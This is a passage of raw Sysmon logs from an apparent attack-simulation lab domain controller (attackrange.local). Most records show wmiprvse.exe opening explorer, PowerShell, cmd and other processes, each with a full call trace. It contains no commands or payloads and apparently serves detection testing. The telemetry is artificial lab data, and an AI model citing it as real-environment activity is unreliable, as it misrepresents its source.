b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.073{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7F88-00000000AD01}3100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.073{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.072{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.072{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.071{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.070{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.070{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.069{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4443811C95AA6CAA9A6CFDDD6D934795,SHA256=206C261A9BA845ABC223DD87CF125865B00C32D1F74951899725F73AD5D91FAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.069{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.069{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.068{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+5